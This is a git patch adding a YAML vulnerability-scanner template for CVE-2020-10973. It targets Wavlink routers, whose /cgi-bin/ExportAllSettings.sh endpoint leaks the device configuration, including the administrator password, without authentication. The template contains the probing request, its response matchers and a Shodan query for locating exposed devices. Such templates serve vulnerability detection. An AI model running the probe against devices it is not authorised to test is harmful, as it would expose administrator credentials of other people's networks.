From f4e7fc7817c7d85939a3bd86ef61ad52fbaaf92a Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 14 Aug 2022 17:26:35 +0530 Subject: [PATCH] Create CVE-2020-10973.yaml --- cves/2020/CVE-2020-10973.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2020/CVE-2020-10973.yaml diff --git a/cves/2020/CVE-2020-10973.yaml b/cves/2020/CVE-2020-10973.yaml new file mode 100644 index 0000000000..0e32877a51 --- /dev/null +++ b/cves/2020/CVE-2020-10973.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-10973 + +info: + name: Wavlink WN530HG4 - Access Control + author: arafatansari + severity: medium + description: | + An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10973 + metadata: + shodan-query: http.html:"WN551K1" + verified: "true" + tags: access,control,cve,2020 + +requests: + - raw: + - | + GET /cgi-bin/ExportAllSettings.sh HTTP/1.1 + Host: {{Hostname}} + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'url=/backupsettings.dat'